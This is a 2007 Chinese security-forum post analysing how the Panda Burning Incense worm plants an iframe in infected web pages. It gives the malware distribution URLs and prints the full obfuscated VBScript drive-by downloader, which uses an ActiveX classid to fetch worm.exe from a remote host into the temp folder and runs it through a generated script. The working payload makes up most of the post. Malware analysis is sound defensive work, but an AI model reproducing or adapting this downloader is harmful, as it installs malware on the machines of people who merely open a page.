【原创】分析熊猫烧香是怎么挂网页病毒的，可以获得样本下载地址哦 bbs.ikaka.com

zhuomingliang - 2007-1-30 16:18:00

熊猫烧香中毒后会向html 这里的文件加个iframe
地址为：
http://www.krvkr.com/worm.htm

用FF 打开，解析出里面的vbs代码

On Error Resume Next
CnLRU="http://www.krvkr.com/worm.exe"
Set Ob = document.createElement("ob"&"je"&"c"&"t")
Ob.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = Ob.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
ExeName="Cn"&"91"&"1.exe"
VbsName="Cn"&"91"&"1.vbs"
Set FPI = Ob.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
AdM=AA&AB
Set Bda = Ob.createobject(AdM,"")
Bda.type=1
Bda.Open
Bda.Write
Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"
Set Shell = Nothing"
Bda.Savetofile VbsName,2
Bda.Close
sRun="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
Set Run = Ob.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0

瑞星卡卡安全论坛